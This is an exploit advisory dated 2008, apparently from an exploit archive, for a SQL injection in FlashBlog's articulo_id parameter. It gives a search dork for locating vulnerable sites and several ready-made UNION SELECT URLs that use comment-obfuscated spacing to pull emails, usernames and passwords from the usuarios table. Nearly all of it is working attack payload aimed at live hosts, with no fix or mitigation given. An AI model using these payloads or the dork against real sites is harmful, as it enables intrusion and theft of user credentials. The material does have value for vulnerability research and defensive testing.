FlashBlog (articulo_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FlashBlog (articulo_id) Remote SQL Injection Vulnerability
# Published : 2008-05-28
# Author : HER0
# Previous Title : Joomla Component Artist (idgalery) SQL Injection Vulnerability
# Next Title : RevokeBB 1.0 RC11 (search) Remote SQL Injection Vulnerability

###############################################################################
#
#   Name   : FlashBlog sql Inyeccion
#   Author : Her0
#   Dork   : "flashblog", allinurl:flashblog.html
#   Greetz : Komtec1,Freak,Knet,Boer,ka0x
#
###############################################################################

Proof of Concept :

    http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
   
   
The colums from host to host are diferent: all resolve =D
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*

   
###############################################################################
#
# Mexico 2008, Thanks all my friends, I love the whisky xD
#
###############################################################################

# www.Syue.com [2008-05-28]